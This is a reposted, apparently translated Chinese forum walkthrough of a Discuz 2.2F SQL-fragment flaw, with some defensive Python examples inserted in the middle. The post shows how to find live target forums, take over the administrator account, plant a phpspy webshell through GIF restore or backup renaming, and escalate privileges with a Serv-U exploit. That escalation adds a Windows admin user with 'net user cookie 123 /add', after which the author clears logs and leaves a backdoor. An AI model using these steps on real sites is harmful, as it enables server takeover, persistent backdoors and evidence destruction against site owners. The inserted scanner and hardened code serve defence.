Discuz vulnerability and promotion permissions

xiaoxiao, 2021-03-06


This vulnerability was discovered by him, I am only writing it up here. Thanks to Angel for the analysis! The vulnerability in Discuz 2.2F lies in the code of register.php, which contains the following:

    $email = trim($email);
    if(!$doublee && strstr($email, '@')) {
        $emailadd = "OR email='$email'";

This means: if the $doublee variable is not set and the e-mail address has a valid format, the variable $emailadd is set to "OR email='$email'", ready for the SQL statement that follows. Further down there is this code:

    $query = $db->query("SELECT COUNT(*) FROM $table_members WHERE username='$username' $emailadd");
    if($db->result($query, 0)) {
        showmessage('profile_account_duplicate');

By default $emailadd = "OR email='$email'" is in effect, so the SQL statement above checks the username or the e-mail address: if either one already exists, the script prompts "The username or email address has already been registered, please go back and fill in the form again."

If we assign a value to $doublee ourselves, the script never builds $emailadd = "OR email='$email'", and we can construct the $emailadd variable ourselves instead. This is why it appears in the form I describe below.

The SQL statement above then becomes:

    SELECT COUNT(*) FROM $table_members WHERE username='$username' AND uid=100000

Because the check now requires both the username and the user ID to match, the condition is never satisfied, so the line

    if($db->result($query, 0)) { showmessage('profile_account_duplicate');

is skipped and execution goes straight to the insert:

    $db->query("INSERT INTO $table_members (........) VALUES (........)");

An account with an already-existing username is thus registered a second time. Now look at memcp.php, which updates user information; the SQL statement there is:

    UPDATE $table_members SET ... WHERE username='$discuz_user'

Changing the password of the account you registered with the same username as the administrator therefore also changes the administrator's password. OK, now for the most exciting part.
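Before the walkthrough, here is an added example (not code from the original post or from Discuz) that reproduces the two defects described above in an in-memory SQLite table and shows the corrected logic beside each: the registration duplicate check that takes $doublee and $emailadd from the request, and the memcp.php password update keyed on the non-unique username. The table name, column names, message strings and the sample request are assumptions constructed for illustration.

```python
import sqlite3

# Constructed in-memory stand-in for the members table the page's queries touch.
# Table and column names are assumptions for illustration, not Discuz's real schema.
ADMIN_UID = 1


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE cdb_members ("
        "uid INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT, adminid INTEGER)"
    )
    # No UNIQUE index on username: that is what lets a second 'admin' row be inserted.
    db.execute(
        "INSERT INTO cdb_members VALUES (?, ?, ?, ?, ?)",
        (ADMIN_UID, "admin", "original-admin-password", "admin@example.invalid", 1),
    )
    db.commit()
    return db


def register_vulnerable(db, form):
    """Mirror of the 2.2F register.php flow: with register_globals every request field
    becomes a variable, so 'doublee' and 'emailadd' are whatever the client sent."""
    username = form.get("username", "")
    email = form.get("email", "").strip()
    doublee = form.get("doublee", "")
    emailadd = form.get("emailadd", "")            # client-controlled SQL fragment
    if not doublee and "@" in email:
        emailadd = f"OR email='{email}'"             # only reached when doublee is empty
    sql = f"SELECT COUNT(*) FROM cdb_members WHERE username='{username}' {emailadd}"
    if db.execute(sql).fetchone()[0]:
        return "profile_account_duplicate"
    db.execute(
        "INSERT INTO cdb_members (username, password, email, adminid) VALUES (?, ?, ?, 0)",
        (username, form.get("password", ""), email),
    )
    db.commit()
    return "registered"


def register_hardened(db, form):
    """Hardened check: the OR clause is fixed in code, never taken from the request,
    and both values are bound as parameters so no fragment can reach the SQL."""
    username = form.get("username", "")
    email = form.get("email", "").strip()
    if "@" not in email:
        return "email_invalid"   # assumption: reject instead of silently dropping the e-mail check
    row = db.execute(
        "SELECT COUNT(*) FROM cdb_members WHERE username=? OR email=?", (username, email)
    ).fetchone()
    if row[0]:
        return "profile_account_duplicate"
    db.execute(
        "INSERT INTO cdb_members (username, password, email, adminid) VALUES (?, ?, ?, 0)",
        (username, form.get("password", ""), email),
    )
    db.commit()
    return "registered"


def change_password_vulnerable(db, username, new_password):
    """memcp.php style: WHERE username=... hits every row that shares the name."""
    cur = db.execute("UPDATE cdb_members SET password=? WHERE username=?", (new_password, username))
    db.commit()
    return cur.rowcount


def change_password_hardened(db, uid, new_password):
    """Key the update on the session's uid, which is unique, not on the display name."""
    cur = db.execute("UPDATE cdb_members SET password=? WHERE uid=?", (new_password, uid))
    db.commit()
    return cur.rowcount


def admin_password(db):
    return db.execute("SELECT password FROM cdb_members WHERE uid=?", (ADMIN_UID,)).fetchone()[0]


# Constructed request shaped like the page's up1.php submission: the admin's username,
# a non-empty 'doublee' to skip the OR clause, and an 'emailadd' fragment that never matches.
ATTACK_FORM = {
    "username": "admin",
    "password": "attacker-chosen",
    "email": "attacker@example.invalid",
    "doublee": "1",
    "emailadd": "AND uid=100000",
}


def run_vulnerable():
    db = make_db()
    outcome = register_vulnerable(db, ATTACK_FORM)
    rows = change_password_vulnerable(db, "admin", "attacker-chosen")
    return outcome, rows, admin_password(db)


def run_hardened():
    db = make_db()
    outcome = register_hardened(db, ATTACK_FORM)
    rows = change_password_hardened(db, ADMIN_UID + 1, "attacker-chosen")  # no such row
    return outcome, rows, admin_password(db)


if __name__ == "__main__":
    print("vulnerable:", run_vulnerable())   # ('registered', 2, 'attacker-chosen')
    print("hardened:  ", run_hardened())     # ('profile_account_duplicate', 0, 'original-admin-password')
```

The vulnerable path shows both halves of the chain: the duplicate check returns a count of zero, the second "admin" row is inserted, and the username-keyed update rewrites two rows including the administrator's. The hardened path keeps the OR clause in code and binds both values, so the request cannot alter the query, and keys the update on uid. A UNIQUE index on username is a cheap third layer that would reject the duplicate INSERT even if the check were bypassed.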

Specific method 1: search Google for Discuz 2.2F forums, open one, click "Members" and find the administrator's username. Put it into up1.php (up1.php is written locally and has the fields Username, Password, Confirm Password and E-mail) in the "administrator ID" field, replace the IP after the form's action with the website's address, save it, then open it in the browser.

A prompt page appears. If the prompt is "The username or email address has already been registered, please go back and fill in the form again. [Click here to return to the previous page]", it did not work: the administrator has patched the vulnerability. If the prompt is "Thank you very much for registering; you will now be logged in to the forum as a member. If your browser does not redirect automatically, please click here", the registration with the administrator's username succeeded. Then go to the "Control Panel", click "Edit Personal Information", change the password, and log in again: you are now the administrator. Next comes privilege escalation. Log in at http://xxxxxxxxx/discuz/admincp.php with your password.

OK, once in, there are two ways to upload a PHP webshell. First: change the webshell's extension to .gif and upload it, then go to Data Management -> Data Backup in the background management and restore the GIF-format webshell as .php; the webshell then sits under /forumdata/ (named "Trojan Word.php" in the original). I uploaded angel's phpspy.php; it has good functionality and is fast. Then privilege escalation: I think the rookies already know this. net start showed that serv-u was running, so I quickly uploaded the serv-u local privilege escalation exploit tool to the current directory and added an administrator: Serv-U "net user cookie 123 /add", Serv-U "net localgroup administrators cookie /add". The server I broke into also had 3389 open, so I tried my luck: I used the 3389 login tool, saw the lovely desktop, then cleaned the logs, planted the trojan and left the door open. I think phpspy is a good back door; everyone can use their own other good trojans or back doors. Remember the shell (to be safe :).

The second method uses the Data Management -> Database Upgrade and Data Backup functions. First open Database Upgrade; under "Please enter the database upgrade statement below:" write: INSERT INTO `cdb_forumlinks`, `displayorder`, `name`, `url`, `note`, `logo`) VALUES ('', '0', '', '', '', ''); then run the upgrade, which prompts "Discuz! data structure successfully upgraded." Next, in Data Backup, change forumdata/dz_1111_vqnys.sql to the .php extension, so that the database backup file becomes our uploaded shell. Happy! Then write a submission page up1.php locally and submit your trojan; privilege escalation is the same as >
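Both upload methods end the same way: a file that the web server will execute as PHP sitting under /forumdata/, either a GIF-extension upload restored as .php or a backup dump renamed from .sql to .php. An added defender-side example (not part of the original post or of Discuz) follows: a scan that walks a data directory and reports script extensions, GIF files without a GIF header, and PHP open tags inside non-script files such as a .sql dump. The directory contents, file names other than dz_1111_vqnys.sql, and the extension list are constructed assumptions.

```python
import os
import re
import shutil
import tempfile

# Extensions the web server would hand to the PHP interpreter; adjust to the server's
# handler configuration (assumption: a default Apache/PHP setup).
SCRIPT_EXTS = {".php", ".php3", ".php4", ".phtml"}
GIF_MAGIC = (b"GIF87a", b"GIF89a")
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def scan_data_dir(root):
    """Walk a data directory and report files that should never be there, or that
    carry PHP code behind a harmless-looking extension. Returns (relpath, reason) pairs."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            with open(path, "rb") as fh:
                head = fh.read(64 * 1024)   # enough to catch a tag in a dump or image header
            if ext in SCRIPT_EXTS:
                findings.append((rel, "script extension inside data directory"))
            if ext == ".gif" and not head.startswith(GIF_MAGIC):
                findings.append((rel, "gif extension without GIF header"))
            if ext not in SCRIPT_EXTS and PHP_TAG.search(head):
                findings.append((rel, "php open tag inside non-script file"))
    return findings


def build_sample_tree():
    """Constructed sample forumdata/ contents; none of these are real Discuz files."""
    root = tempfile.mkdtemp(prefix="forumdata_")
    marker = b"<?php /* constructed marker, no payload */ ?>"
    samples = {
        "dz_0000_clean.sql": b"INSERT INTO `cdb_members` VALUES (1, 'admin');\n",
        "logo.gif": b"GIF89a" + bytes(16),
        # backup renamed from .sql to .php through the data-backup page (method 2)
        "dz_1111_vqnys.php": b"INSERT INTO `cdb_forumlinks` VALUES ('" + marker + b"');\n",
        # injected forum-link record still sitting in a .sql dump
        "dz_2222_injected.sql": b"INSERT INTO `cdb_forumlinks` VALUES ('" + marker + b"');\n",
        # upload carrying a .gif extension but no image header (method 1, before restore)
        "avatar.gif": marker,
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    return root


def demo():
    root = build_sample_tree()
    try:
        return scan_data_dir(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

A scan like this is a detective control for files that have already landed. The preventive counterpart is to refuse script execution under the data and attachment directories at the web server, and not to let the backup and restore features choose arbitrary output extensions.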

Please cite the original address when reprinting: https://www.9cbs.com/read-79572.html
